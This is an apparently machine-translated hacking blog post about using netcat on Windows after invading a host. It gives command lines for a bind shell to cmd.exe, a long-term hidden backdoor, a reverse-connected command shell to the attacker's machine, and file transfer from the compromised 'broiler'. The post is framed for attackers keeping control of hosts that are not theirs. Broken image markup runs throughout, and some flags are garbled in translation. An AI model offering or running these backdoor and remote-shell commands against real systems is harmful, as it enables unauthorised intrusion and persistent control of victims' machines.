After invading the host, some methods of using NC
Tip: Software ------- http://down.51cto.com/data/1982508
1. Port monitoring, can be used with Sfind
Sfind-p Port IP to test whether the ports can be monitored locally;
Nc-vv-l-P port to listen for ports;
650) this.width=650; "title=" 1.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M00/59/96/wKioL1TZZ1_ Xbi8zaad_adwhboe934.jpg "alt=" Wkiol1tzz1_xbi8zaad_adwhboe934.jpg "/>
650) this.width=650; "title=" 2.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M00/59/9A/ Wkiom1tzzmyqmkhlaaaxsmths-o061.jpg "alt=" Wkiom1tzzmyqmkhlaaaxsmths-o061.jpg "/>
2. Build a simple remote shell
Remote host running nc-l-p port-t-e cmd.exe (-t: Telnet connection to-e: program orientation)
This machine can be directly logged in with Telnet remote-ip_address port
650) this.width=650; "title=" 3.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M01/59/96/ Wkiol1tzaynybmznaaau-twf0iy214.jpg "alt=" Wkiol1tzaynybmznaaau-twf0iy214.jpg "/>
650) this.width=650; "title=" 4.jpg "style=" Float:none; "src=" Http://s3.51cto.com/wyfs02/M01/59/9A/wKiom1TZaJawl_ 6faaaxdyk9dai729.jpg "alt=" Wkiom1tzajawl_6faaaxdyk9dai729.jpg "/>
650) this.width=650; "title=" 5.jpg "src=" Http://s3.51cto.com/wyfs02/M01/59/9A/wKiom1TZagmTmzFrAAEq0DgN4WU835.jpg " alt= "Wkiom1tzagmtmzfraaeq0dgn4wu835.jpg"/>
3. Establishment of long-term backdoor
Remote host running nc-l-P port-l-d cmd.exe; other same 2;
650) this.width=650; "title=" 6.jpg "src=" Http://s3.51cto.com/wyfs02/M02/59/9A/wKiom1TZak_ggYp9AAA88cJyfMI281.jpg " alt= "Wkiom1tzak_ggyp9aaa88cjyfmi281.jpg"/>
4. Reverse connection, remote bound Cmdshell
Local ip:192.168.1.6 remote ip:192.168.72.143
Bind the Cmdshell of the remote host to a port on the native IP;
650) this.width=650; "title=" 7.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M01/59/9A/ Wkiom1tza5vwybkzaabvturon6w570.jpg "alt=" Wkiom1tza5vwybkzaabvturon6w570.jpg "/>
Local monitoring of the bound port, automatically connected to the remote host (broiler);
650) this.width=650; "title=" 8.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M02/59/96/wKioL1TZbI_ Hmweiaafmfub O_o 8681.jpg "alt=" Wkiol1tzbi_hmweiaafmfub O_o 8681.jpg "/>
5. Establish a data pipeline and transfer files;
The broiler starts to listen to the port and outputs the output to a file;
650) this.width=650; "title=" 9.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M02/59/9A/ Wkiom1tzcclyavweaachwcejg1k061.jpg "alt=" Wkiom1tzcclyavweaachwcejg1k061.jpg "/>
Locally read the file to be transferred, transfer to the appropriate port;
650) this.width=650; "title=" 10.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M00/59/97/ Wkiol1tzcrwgcr2aaadofw8zp1m513.jpg "alt=" Wkiol1tzcrwgcr2aaadofw8zp1m513.jpg "/>
Successful delivery, simple and affordable;
650) this.width=650; "title=" 11.jpg "style=" Float:none; "src=" http://s3.51cto.com/wyfs02/M00/59/97/ Wkiol1tzcrara3wdaacayncljtu662.jpg "alt=" Wkiol1tzcrara3wdaacayncljtu662.jpg "/>
6. Other functions, such as making honeypot, preemption system service port, scanning port, etc., there are other better software available, follow-up will write ~
This article is from the "Nocturnal Person" blog, so be sure to keep this source http://zerosecurity.blog.51cto.com/9913090/1613252
Hacking weapon, NC Combat (Windows version)